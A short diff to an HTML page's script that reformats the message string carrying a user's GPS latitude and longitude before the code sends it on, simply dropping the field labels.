--- a/index.html
+++ b/index.html
@@ -46,7 +46,7 @@
 
                     // Prepare data with coordinates
                     const data = {
-                        content: `User GPS coordinates: Latitude: ${latitude}, Longitude: ${longitude}`
+                        content: `User GPS coordinates: ${latitude}, ${longitude}`
                     };
 
                     // Send GPS data
